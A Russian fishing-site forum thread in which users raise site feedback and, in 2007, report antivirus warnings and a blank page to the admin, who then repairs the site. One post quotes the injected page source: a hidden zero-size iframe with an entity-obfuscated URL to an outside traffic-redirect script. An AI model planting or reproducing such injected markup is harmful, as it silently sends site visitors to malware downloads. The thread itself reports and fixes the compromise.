Список форумов vlasenko.ru Форумы на Бородатой странице Правила работы на форумах [ Правила работы на форумах ]
Подготовка графики для размещения на форуме [ Прежде, чем закачать картинку... ]
Вход Регистрация FAQ Пользователи Поиск Список форумов vlasenko.ru

Тема: Бороде (Лично)
Предыдущая тема :: Следующая тема  
На страницу Пред.  1, 2

Начать новую тему    вывод темы на печать    Список форумов vlasenko.ru » Ристалище

Крыс [ Сообщение Добавлено: 02.05.2005 10:25 ]

Привет всем. Бороде, Тагиру и Жене - особливое :о)

Вернулся я :о)
Посмотреть профиль Отправить личное сообщение Ответить с цитатой

М. Порешаев Откуда: с рыбалки [ Сообщение Добавлено: 27.05.2005 13:18 ]

Борода, ну тебе наверняка по барабану, но может кто-то другой исправит заглавие тем: Выбор сниннинга для джига
и
Выбор нахлистового удилища

BorMan Moderator Откуда: Москва [ Сообщение Добавлено: 27.05.2005 17:28 ]

М. Порешаев.
Подвинтили где надо... Smile

Юра из умбы-лд Откуда: Умба Мурманский регион [ Сообщение Добавлено: 27.05.2005 20:32 ]

Блин, Борода, когда вы ответите на мою заметку по теме раци и радиосвязь на рыбалке? Ладноть, предлагаю сделать еше тип форумов-лайт.. Оставить аватары, кол-во сообщений, вот чего не надо-по моему.
-дата регистрации, это типа, ты сосунок, с моей датой не сравнишся. Кто-то может умнее, кто-то еще умнее, но дата регистрации тут совсем не к чему.
-зачем нужно поле заголовок сообщения?
-поле дополнительные смайлы, зачем! там по моему отличный от всех других валяется только два или три смайла.
В общем я не разбираюсь в веб дизайне, всякие коды, но лишнее можно убрать.
Надеюсь никого не обидел
С уважением Юрий

П Авида Гость [ Сообщение Добавлено: 14.07.2005 00:29 ]

Весь кайф старой курилки был в том что придя вечером домой и садясь за комп можно было быстро вникнуть в проблему обсуждаемую на форуме.И не секрет ,что часть народа приходила просто шкуру потереть,а часть хотела получить ответы на вопросы.И если кто то задавал вопрос либо большая часть курилки на него реагировала и человек получал свой ответ либо в случае молчания ,которое лично я раценивал как молчаливый совет поискать ответ на вопрос в архивах или на других сайтах.Теперь же если не залезал на форум недели две.
То вникать в тему будешь пять недель.В новом форуме сам черт ногу сломит.А потрещать на тему рыбалки мы все горазды и всегда куча вопросов. И если под каждый вопрос который у меня в голове создавать отдельную тему......
Предлагаю Бороде ограничить кол-во тем как в старой курилке но добавить возможность выкладывать фото.
Фотки ограничить размером.А если кто то захочет посмотреть фотки более подробно.Пустьавтор фоток их мылит.

Удачи всем колегам по диагнозу
Ответить с цитатой

Mikhail Гость [ Сообщение Добавлено: 14.07.2005 02:30 ]

Борода , спасибо что ты есть и есть этот сайт . А форум нам нужен , в старом было архисложно , в этом легче сориентироваться, особенно рыбакам -компьютерным чайникам . А ребята с распальцовкой тоже привыкнут , они хорошие , ведь рыбаки все таки , пусть снизойдут до нас -начинающих .Потерпите мужики!
Ответить с цитатой

Sergei Откуда: Латвия [ Сообщение Добавлено: 09.03.2006 14:20 ]

Бороде.
Всё отлично на вашем сайте.Но одно маленькое НО.
Захожу недели три назад(без регистрации)-а моих фотографий нет,удалили.
Походил по разным темам-а там тоже самое.Воблеростроение-а там одни разговоры,ни картинок,ни фото-кому такое интересно?
Ну и перестал я сюда заглядывать.А сегодня зашёл под своим ником-
Всё есть! Входишь как гость-нет,как пользователь-есть.
Так чтоже не предупредили об этом?А придет новый Гость,начинающий,посмотит-а здесь одни только разговоры(как на http://fisher.spb.ru/cgi-bin/fspbforum/ikonboard.cgi ) и на какие-то фото всё ссылаются.Ну и никогда больше не заглянёт.
Об этом же надо было на главной странице большими буквами написать.

""ТОЛЬКО ЗАРЕГЕСТРИРОВАНЫЕ ПОЛЬЗОВАТЕЛИ МОГУТ ПРОСМАТРИВАТЬ ФОТОГРАФИИ,размещённые на сайте""

Или я чего-то прохлопал? Тогда извиняюсь.

Анатолий [ Сообщение Добавлено: 03.10.2007 09:55 ]

Boroda.

Второй день при входе на сайт www.vlasenko.ru
Касперский орет: «обнаружено: троянская программа Trojan-Downloader.HTML.Agent.fy»
Посмотрите, может быть и вправду что-то не так.

Почта на wwm(гав)cityline.ru не проходит.
Посмотреть профиль Отправить личное сообщение Отправить e-mail Ответить с цитатой

Boroda Site Admin Откуда: Москва [ Сообщение Добавлено: 04.10.2007 02:19 ]

Анатолий.
Просмотрю обязательно...
Скорее всего Касперский орет на сигнатуру кода баннера от JJ-adrenalin...
Больше там подозрительно-криминального ничего нет - голимый html прописанный ручками...
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора Ответить с цитатой

barda Откуда: Рига, Латвия [ Сообщение Добавлено: 05.10.2007 17:20 ]

Продолжает орать Касперский.
Посмотреть профиль Отправить личное сообщение Отправить e-mail Ответить с цитатой

kuzya Откуда: Ближний Восток [ Сообщение Добавлено: 08.10.2007 01:39 ]

Может у меня одного такое происходит: при попытке зайти на сайт www.vlasenko.ru появляется белая страничка без всяких признаков жизни! Shocked
Извините за грубое слово: херня-мерня какая-то.............. Sad

mak210 Откуда: Москва [ Сообщение Добавлено: 08.10.2007 22:56 ]

kuzya :
Может у меня одного такое происходит: при попытке зайти на сайт www.vlasenko.ru появляется белая страничка без всяких признаков жизни! Shocked
Извините за грубое слово: херня-мерня какая-то.............. Sad

Эк, как тебя колбасит-то конкретно! Very Happy Very Happy Very Happy

hg jr Откуда: Москва [ Сообщение Добавлено: 09.10.2007 05:28 ]

kuzya :
Может у меня одного такое происходит: при попытке зайти на сайт www.vlasenko.ru появляется белая страничка

Не у одного тебя .
Всё что есть , вот такой исходний код :
<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#111&#114&#101&#110&#116&#114&#97&#102&#102&#46&#99&#110&#47&#116&#100&#115&#47&#105&#110&#100&#101&#120&#46&#112&#104&#112&#63&#111&#117&#116&#61&#49&#49&#57&#49&#52&#49&#48&#55&#49&#54" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Boroda Site Admin Откуда: Москва [ Сообщение Добавлено: 09.10.2007 20:05 ]

hg jr.
kuzya.
Как сейчас? Вроде должно все работать...
Если нет - свистнуть в мыло: boroda(собака)vlasenko.ru ...
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора Ответить с цитатой

kuzya Откуда: Ближний Восток [ Сообщение Добавлено: 09.10.2007 21:38 ]

О!
Заработало!
СПС!!!!!!!!!!

LA-7b3 Откуда: Брянск [ Сообщение Добавлено: 31.10.2007 12:01 ]

Прошу прощения но случайно в воблерах создал две темы "хит-парад-2007" т.к комп сначала выдал ,что тема не создалась
Может одну удалите
Еще раз извините

Начать новую тему    вывод темы на печать    Список форумов vlasenko.ru » Ристалище

На страницу Пред.  1, 2
Перейти: